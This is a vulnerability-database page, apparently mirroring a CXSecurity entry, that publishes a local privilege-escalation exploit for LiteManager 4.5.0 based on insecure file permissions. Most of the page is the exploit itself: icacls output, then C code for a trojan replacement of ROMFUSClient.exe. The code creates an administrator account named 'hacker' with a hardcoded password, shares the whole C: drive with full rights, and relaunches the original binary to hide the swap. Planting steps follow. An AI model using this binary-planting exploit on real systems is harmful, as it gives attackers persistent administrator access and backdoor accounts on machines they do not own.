投稿
https://cxsecurity.com/issue/WLB-2019110145
LiteManager 4.5.0 - Insecure File Permissions - CXSecurity.com
| 漏洞ID | 1832132 | 漏洞类型 | |
| 发布时间 | 2019-11-22 | 更新时间 | 2019-11-22 |
 CVE编号
|
N/A |  CNNVD-ID
|
N/A |
| 漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: LiteManager 4.5.0 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2019-11-21
# Vendor Homepage : LiteManager Team
# Software Link: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support
# Tested on OS: Windows 7
# Proof of Concept (PoC):
==========================
C:\Program Files\LiteManagerFree - Server>icacls *.exe
ROMFUSClient.exe Everyone:(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
#Exploit code(s):
=================
1) Compile below 'C' code name it as "ROMFUSClient.exe"
#include<windows.h>
int main(void){
system("net user hacker abc123 /add");
system("net localgroup Administrators hacker /add");
system("net share SHARE_NAME=c:\ /grant:hacker,full");
WinExec("C:\\Program Files\\LiteManagerFree\\~ROMFUSClient.exe",0);
return 0;
}
2) Rename original "ROMFUSClient.exe" to "~ROMFUSClient.exe"
3) Place our malicious "ROMFUSClient.exe" in the LiteManagerFree directory
4) Disconnect and wait for a more privileged user to connect and use ROMFUSClient IDE.
Privilege Successful Escalation检索漏洞
开始时间
结束时间